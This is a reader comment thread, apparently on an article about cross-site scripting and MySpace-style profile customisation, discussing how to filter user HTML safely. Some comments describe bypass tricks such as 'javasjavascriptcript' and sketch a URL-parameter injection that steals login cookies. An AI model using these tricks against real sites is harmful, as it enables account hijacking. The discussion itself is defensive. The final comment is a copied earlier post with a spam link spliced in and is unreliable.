Very nice to show the bad code, but somehow the way to protect yourself is always missing in these kind of articles.
Regular expressions are not exactly bread & butter for everyone, so if you want to get the world to notice your warning and act on it, some cut and paste examples would be very helpful.

When will part two be published? In the ALA(A List Apart) publication?

Not being well versed on this subject, it sounds like a site is less likely to be susceptible to XSS(cross-site scripting) when one avoids the usage of eval and avoids muddling style, structure and behavior through the use of the style attribute and inline-javascript. Is this the case? I know this is easier said than done.

It occurs to me if someone just sat down and wrote a stack-based (not regex) parser based closely on a stripped down versions of the HTML, XHTML, XML and CSS specifications, we could have something that would deal quite nicely with attempted XSS attacks. Remember: these are all well documented specifications and the browsers, which trigger these XSS attacks, simply adhere to these specifications.

The ad hoc “tricks” the article prescribes can fall victim to clever attackers. For instance, if you were to use str_replace(‘javascript’, ‘’, $html) your script would still be vulnerable to javasjavascriptcript (this is documented in the XSS cheatsheet posted above, excellent reading for anybody interested in HTML validation).

I think the problem there is that the browser (specifically IE in this case) _doesn’t_ adhere to the specifications; or at least, that it goes beyond the spec by parsing - and executing - sloppy and/or malformed code.

This can be partially mitigated by using a proper DTD for your documents, but you’re right. I suppose the idea about giving users a limited toolset would help prevent malformed code. However… if the parser makes the code *valid as well*, it shouldn’t be a problem.

Using real HTML, CSS and URI parsers seems like the most secure solution, and it only has to be done when processing the input, not every time it’s displayed.

In Java, there’s “TagSoup”:http://mercury.ccil.org/~cowan/XML/tagsoup/ for parsing just about any input HTML, which is a good idea anyway, a few “CSS Parsers”:http://www.w3.org/Style/CSS/SAC/ and the provided URI parser, and presumably other languages have the same.

If you include only the elements, attributes, CSS rules and URI methods you don’t understand, and correctly escape the output with the right “character encoding”:http://www.w3.org/International/O-charset.html I don’t see how anything can slip through.

Seems to me that if I was to summarise this article in a few words, capturing all the important information that is not already second-nature to most web developers, it would be: _"The word ‘javascript’ can have line breaks (and spaces, and other separating chars?) in it”._

All the stuff about escaping special characters, white-listing HTML elements, and being careful about CSS input, have been well-known for years. It’s just that this new ‘ja-vas-cript’ IE trick has come into the limelight recently, because of the MySpace exploit that the author mentions.

Partially in response to Brian Lepore (comment #8), I’d like to help underscore the threat of XSS. *Any time* user input is accepted (even if that input comes directly from a GET or POST variable), it needs to be properly escaped on output or you are at risk of an attack.

Here’s an example that brings it home for me. Imagine a site where you store a cookie for authorization. As you may know, cookie contents are accessible through Javascript. Imagine if this site’s login page would display error messages in the URL, like login.php?error=Incorrect password.

Seems innocent and common enough, but if I am an attacker, and I IM one of the site’s users with a URL like login.php?error=Incorrect password [removed]alert([removed])[removed]
(contrived example), you can see how I’d be able to manipulate the cookies and send their login cookie to my site (through a Javascript redirect). Similarly this can be used for phishing by sending the user to a fake login page via a link on the real site.

With XmlHttpRequest, I’d even be able to force the user to perform actions (via HTTP POST/GET) on the site - such as the voting example given in this article.

To make matters worse, many of the new community sites that are springing up encourage the user to enter HTML, and correctly differentiating valid HTML from invalid HTML is a difficult process. This means that you can’t really use stuff like PHP’s strip_tags() function.

At the moment we’ve got a half-empty glass here. I can’t judge the contents just yet, because if I really want to get to the taste I need the whole thing.
I’m sorry to say, but I find the half of this article useless. It might start making more sense when part two is out and about, but until then this seems like a very lengthy introduction.

I’m sorry that my previous post did not state this, but I am aware of the idea of validating input to protect users.

That said, I have never really understood why many sites have a tendency to use GET data like in your example, rather than keeping then the use of error code numbers. I know, it is quite annoying to have to look up the different numbers when you want to use something, but it saves the worry of someone injecting HTML into your site. In my opinion, the security benefit outways the simplicity in development.

I like the check_tags function in the first link that *ban jax* posted. It looks like a beefed up version of strip_tags that fits the needs of most developers that need to allow HTML.

bq. I like the check_tags function in the first link that ban jax posted. It looks like a beefed up version of strip_tags that fits the needs of most developers that need to allow HTML.

The Iamcal code is quite interesting, but it doesn’t guarantee XHTML 1.0 valid code, since it doesn’t check the children of the elements (a tag within a tag). Also, it’s not easily extensible to environments that need a broader tag base: there’s a lot more to XSS in attributes than a few protocols. Especially true if you decide to allow the style attribute (which, as the article points out, can execute JavaScript too! Fun.)

Shoot me, but I’m not sure why anyone would need image tags for most applications either.

Am I being totally short-sighted here, or can all these security holes be resolved in one simple stroke: don’t let your users personalise their space through real code!

My other half asked me a few days ago to help her style her MySpace stuff (and as it’s the first time I’ve really bothered going there I almost threw up when I saw how s**t it is code-wise) and then gave up after tearing my hair out for ages.

For a start it clearly says “please don’t use CSS to remove any MySpace ads” so immediately I set about doing just that - and succeeded. I then decided to play a little prank on her by adding “table {display:none}” to her style sheet and promptly destroyed the entire site in preview mode.

IMO these sorts of places - MySpace in particular - are so shoddily written it’ll take a CSS expert to write code to successfully style the soup of nested tables, divs and junk to get anything worthwhile looking at - and I doubt the majority of the user base will be these CSS experts (I know I’m not) - and certainly from my own experience anybody half web-dev savvy have their own blogs with crisp, clean blogging systems or just written their bloody own!

I’m all for personalisation and marking your cyber-territory, but surely it’s quicker and easier for the users and safer for the admins to allow personalisation through forms and options. Let the user click the settings they want and the system generates the styles.

MySpace didn’t get popular because it was well-written ;-) It got popular because it gaves users control.

However, I think that you do have a point in not letting users customize space through “real code.” Isn’t that what most forums and blogs do right now by not allowing HTML when they can avoid it? BBCode and Textile are much easier to secure than raw web input.

Well of course you don’t have to let them use real code. You could let them pick between the options you give them. But you could also just not accept their content, or their photos, or their comments..

Like the previous poster said, MySpace sold for many millions of dollars, and it was only because “making profiles pretty” really appeals to teenaged girls and the boys who lust for them. People like to do their own thing.

“But you could also just not accept their content, or their photos, or their comments..”

I think that’s a totally different ball game - not accepting customisation through real code has nothign to do with censorship.

I entirely agree that making “pretty profiles” is the attraction of MySpace and its ilk, but as it’s been mentioned, there are much more secure ways of going about it - allowing real-code submission is just asking for too much trouble.

I think MySpace giving their users freedom to edit their templates CSS was a huge mistake. Sure, the default theme is ugly but the things that the majority of people do to their MySpaces is much worse. They just destroy them beyond any level of readability or sanity.

MySpace would be nicer place without theme editing. Pure Volume is proof of this.

Your article makes a good case for the security codes necessary to hold back abuse of the system. The system still needs to be refined so that legitimate users are not kept out in the same stroke we use to stop abusers. Thanks for raising the topic so well…

I know the article is about XSS, but the example used points to another problem with a lot of these types of sites, not using a validation scheme for the ‘voting’ script, or scripts that control other types of changes.

A simple check for a valid random unique id in voteOnAuser.php would kill any chance of a XSS vulnerability such as this from having any effect because the ‘vote’ would automaticaly be rejected.

And a big applause to #28, if you’re going to allow customization then by all means have complete control over the code yourself.

All that customization of web application reminds me of an article on network security.

Pick your poison, do you want to restrict the user to a know and limited set of features or chase all the hacks that people will find?

With the first approach you define and design it once; the other approach is a never ending race to ensure your application is safe from the known tricks and hacks.

Ok, it takes more time to develop the white list; most certainly feels more restrictive from a user standpoint but I guess it depends if you prefer to appear on the front page because you’re application is great or because somebody took control of other people’s account.

The ad hoc “tricks”? the article prescribes can fall victim to clever attackers. For instance, if you were to use str_replace(”˜javascript’, ‘’, $html) your script would still be
www.replicahours.com vulnerable to javasjavascriptcript (this is documented in the XSS cheatsheet posted above, excellent reading for anybody interested in HTML validation).